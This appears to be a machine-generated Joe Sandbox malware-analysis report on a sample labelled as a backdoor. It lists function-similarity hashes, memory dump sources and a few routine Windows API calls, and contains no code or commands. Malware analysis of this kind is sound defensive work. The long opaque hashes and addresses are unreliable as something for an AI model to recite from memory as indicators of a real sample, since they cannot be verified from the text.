                                                • Opcode Fuzzy Hash: a1490598ca9bd5d016692bdd55a104cc3e87730bef86a570e03a20a85b5f1259
                                                • Instruction Fuzzy Hash: 5731D27590122CABCB61DF65D888B9DBBB8BF08310F5041EAF90CA7251EB349F858F45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                                • Instruction ID: fcc54cb20f15ede2135b41fb6f43da6b551056f77a1626fc9e28d064914c6c1b
                                                • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                                • Instruction Fuzzy Hash: 4B020B72E0021D9BDF15CFA9C9806ADFBF1EF48324F25416AE919E7384D735A941CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007EA662
                                                • GetNumberFormatW.KERNEL32(00000400,00000000,?,0080E600,?,?), ref: 007EA6B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FormatInfoLocaleNumber
                                                • String ID:
                                                • API String ID: 2169056816-0
                                                • Opcode ID: 5f2f73471ee5d881c6e79a6dc6586f12919ae0c6827ffcc55844e0dec6936d78
                                                • Instruction ID: be095410e4b9cdbb818f14a3182fa90d34c0e58ef4ac43aa44582acc3806ef89
                                                • Opcode Fuzzy Hash: 5f2f73471ee5d881c6e79a6dc6586f12919ae0c6827ffcc55844e0dec6936d78
                                                • Instruction Fuzzy Hash: 80014C36210208BEDB608FA4EC09F9B77BCFF19710F004822BA1497250D3719A55C7A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(007E117C,?,00000200), ref: 007D6EC9
                                                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 007D6EEA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: 43b2c760f01655e85bd3264cea07d21d31297b7ed4bb03283bdfb5be28723dd1
                                                • Instruction ID: db8549f9721fb783618aada5c7b36dfd6b29fe30abb72de8e5ec27d9b05e249c
                                                • Opcode Fuzzy Hash: 43b2c760f01655e85bd3264cea07d21d31297b7ed4bb03283bdfb5be28723dd1
                                                • Instruction Fuzzy Hash: 11D0C9353C8302BFEA510A75CC06F2B7BA8B755B82F20C515B356E90E0CA7090149629
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0080118F,?,?,00000008,?,?,00800E2F,00000000), ref: 008013C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 1d798b90cfec7f713505920b6f6a55c50d1d911e07d04ca2a112fea3f215d668
                                                • Instruction ID: 963c41a643fa3c07775f91aa7d24f301a0d8c90c3535c95bb899c2f251ee5d4e
                                                • Opcode Fuzzy Hash: 1d798b90cfec7f713505920b6f6a55c50d1d911e07d04ca2a112fea3f215d668
                                                • Instruction Fuzzy Hash: E1B15C31610608DFDB59CF28C88AB657BE1FF45368F258658E999CF2E1C335E982CB44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: gj
                                                • API String ID: 0-4203073231
                                                • Opcode ID: b9c73690b3df0f7de1775469a85723611cbaf6dbac979fc42faf4b30ba2051e6
                                                • Instruction ID: befd442f24ba0fb68bf857b70796992a80770d10f8c97323de19a976220bdfa5
                                                • Opcode Fuzzy Hash: b9c73690b3df0f7de1775469a85723611cbaf6dbac979fc42faf4b30ba2051e6
                                                • Instruction Fuzzy Hash: 20F1C3B1A083418FD788CF29D880A1AFBE1BFCC208F15892EF598D7711E735E9558B56
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 007DAD1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Version
                                                • String ID:
                                                • API String ID: 1889659487-0
                                                • Opcode ID: 7535536bd06c8b32f6528c5be77d4c385b6cf78e57766574fa229a12b64c5893
                                                • Instruction ID: 992c4fb6e1a9ff1fb37f9a00254d112f7bd216419e04ee432d7cfddf364015d9
                                                • Opcode Fuzzy Hash: 7535536bd06c8b32f6528c5be77d4c385b6cf78e57766574fa229a12b64c5893
                                                • Instruction Fuzzy Hash: 8EF05B70E0060C8FCB24CF18EC425D573B6FB59711F10469AD91543798D7B46D81CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,007EEAC5), ref: 007EF068
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: ea0b88c9d9222711944c3a86269fbf3ac4ba1759c6505ea2f08c658dc034a381
                                                • Instruction ID: 6344f90d8a7330e354d2d681c126147c253565e7fe081e7d8ac59cc40e59ceb4
                                                • Opcode Fuzzy Hash: ea0b88c9d9222711944c3a86269fbf3ac4ba1759c6505ea2f08c658dc034a381
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: 54d0be813de643df426297e25ccc71128f639a8a57f1b10f89d22900c50bc23c
                                                • Instruction ID: 5ea46d2d7847806337a30605b8bd5fe641c738de8c534cb25e4cba0c09e81c87
                                                • Opcode Fuzzy Hash: 54d0be813de643df426297e25ccc71128f639a8a57f1b10f89d22900c50bc23c
                                                • Instruction Fuzzy Hash: 57A001B46022018BDB808FB6AA0E2093AADBA99A91709866AA509C6160EA2485609F11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                                • Instruction ID: 645c61cf3c32eb0cc05564329488c7299b32d044cf4d18f907434badf3c46ec7
                                                • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                                • Instruction Fuzzy Hash: 6C622971605BC99FCB25CF39C8906B9BBE1AFA9304F04856DD99B8B342D638E945CB10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                                • Instruction ID: 764f4cd911430224bf23c957083dab6661b687da2ff82b1ee810e7bb07e4a3c5
                                                • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                                • Instruction Fuzzy Hash: 9F6225706097CA9FC71DCF29C8805B9BBE1BF59308F14866DD9A687742E338E955CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                                • Instruction ID: 9948d3c66bd18088c51898b5f2157b845907c58a81f38787ee8b0c314eea2706
                                                • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                                • Instruction Fuzzy Hash: 795229726087058FC718CF19C891A6AF7E1FFCC304F498A2DE9859B255D734EA19CB86
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 850a0552ed23622c03eda8672ba53660739675351315613b49c19e16cda0a723
                                                • Instruction ID: 32ed8212ed981447c0760137e3895264b7ef6dc4499640357e054e24a23eba62
                                                • Opcode Fuzzy Hash: 850a0552ed23622c03eda8672ba53660739675351315613b49c19e16cda0a723
                                                • Instruction Fuzzy Hash: E812E4B17057868BC728CF29C894679B3E0FF68304F14893EE597C7A81E778A895CB45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8dab4b9b2e627726f5ad26cfd9de5bbea9923519f05a52dcd831738ee2d4018
                                                • Instruction ID: a3136d4f254ac8d2289e81ba02530ce4d0ea139be467b4789de679aa3b8f6965
                                                • Opcode Fuzzy Hash: e8dab4b9b2e627726f5ad26cfd9de5bbea9923519f05a52dcd831738ee2d4018
                                                • Instruction Fuzzy Hash: 90F166726083028FC719CE29C98496ABBF5EBC9314F148A2EF59597356D738E906CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: dbb136d4d16c488388a9be8874249ff8179057ac39a43ff3259f8e0dc5387065
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: E6C1A3362150974ADF2D4639893403FFBA16AA27B131A079DD5B3CB3C6FF28D524DA60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: f7deec4da062b967c48b5073adbb2741d27a17b64f05ff4707cff4a5243ec56d
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: 4FC1B6362051974ADF2D4639C93403FBBA16EA27B171A07ADD5B2CB3C5FF28D524D620
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction ID: c8e726b16ee8fce23fd7f50f46ad3589bee3847d5f77a2f6adedbceea94cf7e9
                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                • Instruction Fuzzy Hash: 5CC186362051970ADF2D4639897403FBBA16EA17B131A079DD5B3CB3C6FF18D524DAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
